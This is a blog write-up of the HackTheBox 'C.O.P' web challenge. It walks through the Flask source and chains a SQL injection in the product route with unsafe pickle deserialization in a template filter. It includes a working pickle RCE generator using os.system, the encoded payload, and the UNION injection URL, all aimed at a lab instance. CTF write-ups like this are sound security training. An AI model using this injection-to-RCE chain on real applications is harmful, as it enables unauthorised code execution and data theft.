<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->


<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>C.O.P - Web challenge - HackTheBox | Nehal Zaman</title>
<meta name="generator" content="Jekyll v4.3.1" />
<meta property="og:title" content="C.O.P - Web challenge - HackTheBox" />
<meta name="author" content="Nehal Zaman" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="A perpetual learner. CTF player. Programmer." />
<meta property="og:description" content="A perpetual learner. CTF player. Programmer." />
<link rel="canonical" href="http://localhost:4000/posts/cop_htb.html" />
<meta property="og:url" content="http://localhost:4000/posts/cop_htb.html" />
<meta property="og:site_name" content="Nehal Zaman" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-12-21T00:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="C.O.P - Web challenge - HackTheBox" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Nehal Zaman"},"dateModified":"2022-12-21T00:00:00-05:00","datePublished":"2022-12-21T00:00:00-05:00","description":"A perpetual learner. CTF player. Programmer.","headline":"C.O.P - Web challenge - HackTheBox","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/cop_htb.html"},"url":"http://localhost:4000/posts/cop_htb.html"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1>Nehal Zaman</h1>
        </a>
        <h2>A perpetual learner. CTF player. Programmer.</h2>

        <section id="downloads">
          
        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>21 December 2022</small>
<h1>C.O.P - Web challenge - HackTheBox</h1>

<p class="view">by Nehal Zaman</p>

<p><img src="/assets/images/writeups/cop/banner.png" alt="" /></p>

<h1 id="introduction">INTRODUCTION</h1>

<p><strong>C.O.P</strong> is an apparently easy web-based challenge created by <a href="https://www.hackthebox.com/home/users/profile/52045">InfoSecJack</a>.</p>

<p>It involves exploitation of <strong>SQL injection</strong> followed by <strong>insecure deserialization</strong>.</p>

<p>Apart from the running instance, the source code of the web application is given.</p>

<h1 id="going-through-source-code">GOING THROUGH SOURCE CODE</h1>

<p>The entrypoint to the application is at <code class="language-plaintext highlighter-rouge">challenge/run.py</code>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">application.app</span> <span class="kn">import</span> <span class="n">app</span>
<span class="kn">from</span> <span class="nn">application.database</span> <span class="kn">import</span> <span class="n">migrate_db</span>

<span class="k">with</span> <span class="n">app</span><span class="p">.</span><span class="n">app_context</span><span class="p">():</span>
    <span class="n">migrate_db</span><span class="p">()</span>

<span class="n">app</span><span class="p">.</span><span class="n">run</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s">'0.0.0.0'</span><span class="p">,</span> <span class="n">port</span><span class="o">=</span><span class="mi">1337</span><span class="p">,</span> <span class="n">debug</span><span class="o">=</span><span class="bp">False</span><span class="p">,</span> <span class="n">use_evalex</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
</code></pre></div></div>

<p>It gives reference to the main <code class="language-plaintext highlighter-rouge">Flask</code> application script at <code class="language-plaintext highlighter-rouge">challenge/application/app.py</code>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">g</span>
<span class="kn">from</span> <span class="nn">application.blueprints.routes</span> <span class="kn">import</span> <span class="n">web</span>
<span class="kn">import</span> <span class="nn">pickle</span><span class="p">,</span> <span class="n">base64</span>

<span class="n">app</span> <span class="o">=</span> <span class="n">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span>
<span class="n">app</span><span class="p">.</span><span class="n">config</span><span class="p">.</span><span class="n">from_object</span><span class="p">(</span><span class="s">'application.config.Config'</span><span class="p">)</span>

<span class="n">app</span><span class="p">.</span><span class="n">register_blueprint</span><span class="p">(</span><span class="n">web</span><span class="p">,</span> <span class="n">url_prefix</span><span class="o">=</span><span class="s">'/'</span><span class="p">)</span>

<span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">template_filter</span><span class="p">(</span><span class="s">'pickle'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">pickle_loads</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
	<span class="k">return</span> <span class="n">pickle</span><span class="p">.</span><span class="n">loads</span><span class="p">(</span><span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">s</span><span class="p">))</span>

<span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">teardown_appcontext</span>
<span class="k">def</span> <span class="nf">close_connection</span><span class="p">(</span><span class="n">exception</span><span class="p">):</span>
    <span class="n">db</span> <span class="o">=</span> <span class="nb">getattr</span><span class="p">(</span><span class="n">g</span><span class="p">,</span> <span class="s">'_database'</span><span class="p">,</span> <span class="bp">None</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">db</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span> <span class="n">db</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> 
</code></pre></div></div>

<p>There are 2 things worth noting here:</p>

<ul>
  <li>The routes for this <code class="language-plaintext highlighter-rouge">Flask</code> application can be found at <code class="language-plaintext highlighter-rouge">challenge/application/blueprints/routes.py</code>.</li>
  <li>The <code class="language-plaintext highlighter-rouge">pickle</code> module is being used in a template filter called <strong>‘pickle’</strong> to deserialize some data here which might be vulnerable to insecure deserialization if that data can be controlled by us.</li>
</ul>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">flask</span> <span class="kn">import</span> <span class="n">Blueprint</span><span class="p">,</span> <span class="n">render_template</span>
<span class="kn">from</span> <span class="nn">application.models</span> <span class="kn">import</span> <span class="n">shop</span>

<span class="n">web</span> <span class="o">=</span> <span class="n">Blueprint</span><span class="p">(</span><span class="s">'web'</span><span class="p">,</span> <span class="n">__name__</span><span class="p">)</span>

<span class="o">@</span><span class="n">web</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">index</span><span class="p">():</span>
    <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'index.html'</span><span class="p">,</span> <span class="n">products</span><span class="o">=</span><span class="n">shop</span><span class="p">.</span><span class="n">all_products</span><span class="p">())</span> 

<span class="o">@</span><span class="n">web</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/view/&lt;product_id&gt;'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">product_details</span><span class="p">(</span><span class="n">product_id</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'item.html'</span><span class="p">,</span> <span class="n">product</span><span class="o">=</span><span class="n">shop</span><span class="p">.</span><span class="n">select_by_id</span><span class="p">(</span><span class="n">product_id</span><span class="p">))</span>
</code></pre></div></div>

<p>There are 2 routes here.</p>

<p>The <code class="language-plaintext highlighter-rouge">/</code> route simply renders the <code class="language-plaintext highlighter-rouge">index.html</code>. Also, the template expects a Jinja variable <code class="language-plaintext highlighter-rouge">products</code> whose values are fetched from the database.</p>

<p>Similarly, the <code class="language-plaintext highlighter-rouge">/view/&lt;product_id&gt;</code> renders <code class="language-plaintext highlighter-rouge">item.html</code>, and also expects another Jinja variable <code class="language-plaintext highlighter-rouge">product</code> whose value again is fetched from the database.</p>

<p>Apart from these, there is also a database model having <code class="language-plaintext highlighter-rouge">shop</code> table.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
SNIP
.
.
<span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"container px-4 px-lg-5 my-5"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"row gx-4 gx-lg-5 align-items-center"</span><span class="nt">&gt;</span>
    { % set item = product | pickle % }
    <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"col-md-6"</span><span class="nt">&gt;&lt;img</span> <span class="na">class=</span><span class="s">"card-img-top mb-5 mb-md-0"</span> <span class="na">src=</span><span class="s">"{ { item.image } }"</span> <span class="na">alt=</span><span class="s">"..."</span> <span class="nt">/&gt;&lt;/div&gt;</span>
        <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"col-md-6"</span><span class="nt">&gt;</span>
            <span class="nt">&lt;h1</span> <span class="na">class=</span><span class="s">"display-5 fw-bolder"</span><span class="nt">&gt;</span>{ { item.name } }<span class="nt">&lt;/h1&gt;</span>
            <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"fs-5 mb-5"</span><span class="nt">&gt;</span>
                <span class="nt">&lt;span&gt;</span>£{ { item.price } }<span class="nt">&lt;/span&gt;</span>
            <span class="nt">&lt;/div&gt;</span>
            <span class="nt">&lt;p</span> <span class="na">class=</span><span class="s">"lead"</span><span class="nt">&gt;</span>{ { item.description } }<span class="nt">&lt;/p&gt;</span>
        <span class="nt">&lt;/div&gt;</span>
    <span class="nt">&lt;/div&gt;</span>
<span class="nt">&lt;/div&gt;</span>
.
.
SNIP

</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">pickle</code> template filter that is found earlier is being used in the <code class="language-plaintext highlighter-rouge">item.html</code> template.</p>

<p>The value of <code class="language-plaintext highlighter-rouge">product</code> Jinja variable is deserialized using pickle before it is used in the template.</p>

<p>This narrows down to the fact that if we can control <code class="language-plaintext highlighter-rouge">product</code> variable, we might be able to exploit insecure deserialization in <code class="language-plaintext highlighter-rouge">pickle</code> module.</p>

<p>The definition for the database model is at <code class="language-plaintext highlighter-rouge">challenge/application/models.py</code>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="kn">from</span> <span class="nn">application.database</span> <span class="kn">import</span> <span class="n">query_db</span>

<span class="k">class</span> <span class="nc">shop</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>

    <span class="o">@</span><span class="nb">staticmethod</span>
    <span class="k">def</span> <span class="nf">select_by_id</span><span class="p">(</span><span class="n">product_id</span><span class="p">):</span>
        <span class="k">return</span> <span class="n">query_db</span><span class="p">(</span><span class="sa">f</span><span class="s">"SELECT data FROM products WHERE id='</span><span class="si">{</span><span class="n">product_id</span><span class="si">}</span><span class="s">'"</span><span class="p">,</span> <span class="n">one</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>

    <span class="o">@</span><span class="nb">staticmethod</span>
    <span class="k">def</span> <span class="nf">all_products</span><span class="p">():</span>
        <span class="k">return</span> <span class="n">query_db</span><span class="p">(</span><span class="s">'SELECT * FROM products'</span><span class="p">)</span>     

</code></pre></div></div>

<p>There are few things worth noting here:</p>

<ul>
  <li>The function <code class="language-plaintext highlighter-rouge">query_db()</code> defined in <code class="language-plaintext highlighter-rouge">challenges/application/database.py</code> takes a query as parameter and runs it on the database.</li>
  <li>There is no sanitation being done on the <code class="language-plaintext highlighter-rouge">product_id</code> value in query parameter of <code class="language-plaintext highlighter-rouge">query_db()</code> in <code class="language-plaintext highlighter-rouge">select_by_id()</code> method.</li>
  <li>And if we go back, we can see that the <code class="language-plaintext highlighter-rouge">product_id</code> is referenced from the <code class="language-plaintext highlighter-rouge">/view/&lt;product_id&gt;</code> route, which is totally in control of us.</li>
  <li>So there is a SQL injection vulnerability.</li>
</ul>

<h1 id="connecting-pieces-together">CONNECTING PIECES TOGETHER</h1>

<p>We can control <code class="language-plaintext highlighter-rouge">product_id</code> from the route <code class="language-plaintext highlighter-rouge">/view/&lt;product_id&gt;</code> through the SQL injection.</p>

<p>This means we also have control over <code class="language-plaintext highlighter-rouge">product</code> jinja variable in the template <code class="language-plaintext highlighter-rouge">item.html</code>.</p>

<p>The above 2 facts lead to the conclusion that we can exploit an insecure deserialization in the <code class="language-plaintext highlighter-rouge">pickle</code> module through the <code class="language-plaintext highlighter-rouge">product_id</code> parameter in <code class="language-plaintext highlighter-rouge">/view/&lt;product_id&gt;</code> route.</p>

<h1 id="a-weird-thing">A WEIRD THING</h1>

<p>The definition of <code class="language-plaintext highlighter-rouge">query_db()</code> is below:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="k">def</span> <span class="nf">query_db</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(),</span> <span class="n">one</span><span class="o">=</span><span class="bp">False</span><span class="p">):</span>
    <span class="k">with</span> <span class="n">app</span><span class="p">.</span><span class="n">app</span><span class="p">.</span><span class="n">app_context</span><span class="p">():</span>
        <span class="n">cur</span> <span class="o">=</span> <span class="n">get_db</span><span class="p">().</span><span class="n">execute</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="n">args</span><span class="p">)</span>
        <span class="n">rv</span> <span class="o">=</span> <span class="p">[</span><span class="nb">dict</span><span class="p">((</span><span class="n">cur</span><span class="p">.</span><span class="n">description</span><span class="p">[</span><span class="n">idx</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">value</span><span class="p">)</span> \
            <span class="k">for</span> <span class="n">idx</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">row</span><span class="p">))</span> <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">cur</span><span class="p">.</span><span class="n">fetchall</span><span class="p">()]</span>
        <span class="k">print</span><span class="p">(</span><span class="n">rv</span><span class="p">)</span>
        <span class="k">return</span> <span class="p">(</span><span class="nb">next</span><span class="p">(</span><span class="nb">iter</span><span class="p">(</span><span class="n">rv</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">values</span><span class="p">()))</span> <span class="k">if</span> <span class="n">rv</span> <span class="k">else</span> <span class="bp">None</span><span class="p">)</span> <span class="k">if</span> <span class="n">one</span> <span class="k">else</span> <span class="n">rv</span>

</code></pre></div></div>

<p>There is a second parameter apart from the query which is named <code class="language-plaintext highlighter-rouge">one</code> and set to <code class="language-plaintext highlighter-rouge">False</code> by default.</p>

<p>This parameter basically decides if the function should return a single output row or all of the rows based on the value of <code class="language-plaintext highlighter-rouge">one</code> parameter.</p>

<p>It returns only the first row if the value of <code class="language-plaintext highlighter-rouge">one</code> is <code class="language-plaintext highlighter-rouge">True</code>.</p>

<p>And unfortunately the value of <code class="language-plaintext highlighter-rouge">one</code> is set to <code class="language-plaintext highlighter-rouge">True</code> in <code class="language-plaintext highlighter-rouge">query_db()</code> function of <code class="language-plaintext highlighter-rouge">select_by_id()</code> method.</p>

<p>That means if we try to inject our payload using the <code class="language-plaintext highlighter-rouge">UNION</code> sql injection method, it is supposed to not get deserialized since <code class="language-plaintext highlighter-rouge">select_by_id()</code> method will return the first output row from the query, which is a valid one.</p>

<p>Obviously, another way can be like exploiting a SQL stacked query to <code class="language-plaintext highlighter-rouge">INSERT/UPDATE</code> a new record containing malicious payload. But the <code class="language-plaintext highlighter-rouge">sqlite3</code> module in <code class="language-plaintext highlighter-rouge">python</code> does not support executing multiple queries using a single <code class="language-plaintext highlighter-rouge">execute()</code> method. So this is out-of-question.</p>

<p>But let us do not get drowned by assumptions and see things for practical.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~]
└─<span class="nv">$ </span>docker run <span class="nt">-it</span> cop:latest sh
/app <span class="c"># python run.py </span>
 <span class="k">*</span> Serving Flask app <span class="s1">'application.app'</span>
 <span class="k">*</span> Debug mode: off
WARNING: This is a development server. Do not use it <span class="k">in </span>a production deployment. Use a production WSGI server instead.
 <span class="k">*</span> Running on all addresses <span class="o">(</span>0.0.0.0<span class="o">)</span>
 <span class="k">*</span> Running on http://127.0.0.1:1337
 <span class="k">*</span> Running on http://172.17.0.2:1337
Press CTRL+C to quit
^C/app <span class="c">#</span>

</code></pre></div></div>

<p>I have popped an interactive <code class="language-plaintext highlighter-rouge">sh</code> shell on docker image.</p>

<p>I also ran the entrypoint script, as this will do all the migration stuff and create the schema in the database.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="n">app</span> <span class="c1"># python
</span><span class="n">Python</span> <span class="mf">3.8</span><span class="p">.</span><span class="mi">16</span> <span class="p">(</span><span class="n">default</span><span class="p">,</span> <span class="n">Dec</span>  <span class="mi">8</span> <span class="mi">2022</span><span class="p">,</span> <span class="mi">03</span><span class="p">:</span><span class="mi">43</span><span class="p">:</span><span class="mi">16</span><span class="p">)</span> 
<span class="p">[</span><span class="n">GCC</span> <span class="mf">12.2</span><span class="p">.</span><span class="mi">1</span> <span class="mi">20220924</span><span class="p">]</span> <span class="n">on</span> <span class="n">linux</span>
<span class="n">Type</span> <span class="s">"help"</span><span class="p">,</span> <span class="s">"copyright"</span><span class="p">,</span> <span class="s">"credits"</span> <span class="ow">or</span> <span class="s">"license"</span> <span class="k">for</span> <span class="n">more</span> <span class="n">information</span><span class="p">.</span>
<span class="o">&gt;&gt;&gt;</span> 
<span class="o">&gt;&gt;&gt;</span> <span class="kn">import</span> <span class="nn">sqlite3</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">con</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="s">'cop.db'</span><span class="p">)</span>
<span class="o">&gt;&gt;&gt;</span> 
<span class="o">&gt;&gt;&gt;</span> <span class="n">con</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT 'I am first' UNION SELECT 'I am last'"</span><span class="p">).</span><span class="n">fetchall</span><span class="p">()</span>
<span class="p">[(</span><span class="s">'I am first'</span><span class="p">,),</span> <span class="p">(</span><span class="s">'I am last'</span><span class="p">,)]</span>
<span class="o">&gt;&gt;&gt;</span> 

</code></pre></div></div>

<p>As expected, the string before the <code class="language-plaintext highlighter-rouge">UNION</code> comes first, and the string after <code class="language-plaintext highlighter-rouge">UNION</code> comes last.</p>

<p>Now see the MAGIC!!</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="o">&gt;&gt;&gt;</span> <span class="n">con</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT data FROM products WHERE id = '1' UNION SELECT 'I am supposed to come last, what the heck!!'"</span><span class="p">).</span><span class="n">fetchall</span><span class="p">()</span>
<span class="p">[(</span><span class="s">'I am supposed to come last, what the heck!!'</span><span class="p">,),</span> <span class="p">(</span><span class="s">'gASVoAAAAAAAAACMFGFwcGxpY2F0aW9uLmRhdGFiYXNllIwESXRlbZSTlCmBlH2UKIwEbmFtZZSMDFBpY2tsZSBTaGlydJSMC2Rlc2NyaXB0aW9ulIwZR2V0IG91ciBuZXcgcGlja2xlIHNoaXJ0IZSMBWltYWdllIwfL3N0YXRpYy9pbWFnZXMvcGlja2xlX3NoaXJ0LmpwZ5SMBXByaWNllIwCMjOUdWIu'</span><span class="p">,)]</span>
<span class="o">&gt;&gt;&gt;</span> 

</code></pre></div></div>

<p>When we used a query on the <code class="language-plaintext highlighter-rouge">products</code> table with <code class="language-plaintext highlighter-rouge">WHERE</code> clause, the string after <code class="language-plaintext highlighter-rouge">UNION</code> comes first in the output and the output of the original query before the <code class="language-plaintext highlighter-rouge">UNION</code> comes at last.</p>

<p>This behaviour can be used to our advantage. We can use <code class="language-plaintext highlighter-rouge">UNION</code> in the SQL injection to inject our deserialization payload, and by this behaviour the injected payload will be deserialized and we might get code execution.</p>

<h1 id="crafting-deserialization-payload">CRAFTING DESERIALIZATION PAYLOAD</h1>

<p>I do not intend to spend much time in explaining deserialization in pickle.</p>

<p>You can refer to this <a href="https://davidhamann.de/2020/04/05/exploiting-python-pickle/">guide</a> for specifics about the topic.</p>

<p>Let me give you an overview: while deserializing a pickled python class, if there is a <code class="language-plaintext highlighter-rouge">__reduce__</code> method defined in the class, it is supposed to return a function along with a tuple of arguments. Finally, the returned function is called, with the arguments in the returned tuple. This essentially gives us the potential to achieve code execution.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="kn">import</span> <span class="nn">pickle</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">import</span> <span class="nn">os</span>


<span class="k">class</span> <span class="nc">RCE</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__reduce__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">cmd</span> <span class="o">=</span> <span class="p">(</span><span class="s">'cp /app/flag.txt /app/application/static/flag.txt'</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">,</span> <span class="p">(</span><span class="n">cmd</span><span class="p">,)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
    <span class="n">pickled</span> <span class="o">=</span> <span class="n">pickle</span><span class="p">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">RCE</span><span class="p">())</span>
    <span class="k">print</span><span class="p">(</span><span class="n">base64</span><span class="p">.</span><span class="n">urlsafe_b64encode</span><span class="p">(</span><span class="n">pickled</span><span class="p">))</span>

</code></pre></div></div>

<p>We have created a <code class="language-plaintext highlighter-rouge">RCE</code> class having defined a <code class="language-plaintext highlighter-rouge">__reduce__()</code> method that returns the function <code class="language-plaintext highlighter-rouge">os.system</code> and a tuple having a <code class="language-plaintext highlighter-rouge">bash</code> command as a value. Then we serialize and base64 the output.</p>

<p>When the output is deserialized, the <code class="language-plaintext highlighter-rouge">/app/flag.txt</code> is copied to <code class="language-plaintext highlighter-rouge">/app/application/static/flag.txt</code> which is the static directory of <code class="language-plaintext highlighter-rouge">Flask</code> and is publicly accessible.</p>

<p>The reason I <code class="language-plaintext highlighter-rouge">cp</code>‘ed it and not <code class="language-plaintext highlighter-rouge">cat</code>‘ed because it is a blind injection and we can not see the output of <code class="language-plaintext highlighter-rouge">cat</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/…/challenges/web/c.o.p/exploit]
└─<span class="nv">$ </span>python exploit.py 
b<span class="s1">'gASVTAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDFjcCAvYXBwL2ZsYWcudHh0IC9hcHAvYXBwbGljYXRpb24vc3RhdGljL2ZsYWcudHh0lIWUUpQu'</span>

</code></pre></div></div>

<p>We have crafted the deserialization payload.</p>

<h1 id="crafting-sql-injection-payload">CRAFTING SQL INJECTION PAYLOAD</h1>

<p>The injection point is the <code class="language-plaintext highlighter-rouge">product_id</code> in the <code class="language-plaintext highlighter-rouge">/view/&lt;product_id&gt;</code> route.</p>

<p>If the id of the product is <code class="language-plaintext highlighter-rouge">1</code>, the full URL will be <code class="language-plaintext highlighter-rouge">http://[IP]:[PORT]/view/1</code>.</p>

<p>We want to use <code class="language-plaintext highlighter-rouge">UNION</code> to inject the deserialized payload. The final payload will be:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
http://[IP]:[PORT]/view/1<span class="s1">' UNION SELECT '</span>gASVTAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDFjcCAvYXBwL2ZsYWcudHh0IC9hcHAvYXBwbGljYXRpb24vc3RhdGljL2ZsYWcudHh0lIWUUpQu<span class="s1">';--

</span></code></pre></div></div>

<p>After we make the HTTP request to the payload URL, we just need to check for <code class="language-plaintext highlighter-rouge">flag.txt</code> in <code class="language-plaintext highlighter-rouge">/static</code> route.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/…/challenges/web/c.o.p/exploit]
└─<span class="nv">$ </span>curl <span class="s1">'http://172.17.0.2:1337/static/flag.txt'</span>                                                                                                                                     
HTB<span class="o">{</span>f4k3_fl4gs_f0r_t3st1ng<span class="o">}</span>

</code></pre></div></div>

<p>We can see that our payload worked. Try the same thing on the running instance to get the real flag.</p>

<p>This is all I have in this challenge.</p>

<p>Thanks for reading this far :) Hope you liked it.</p>



  <small>tags: <em>sql injection</em> - <em>pickle</em> - <em>insecure deserialization</em></small>


      </section>
    </div>
  </body>
</html>
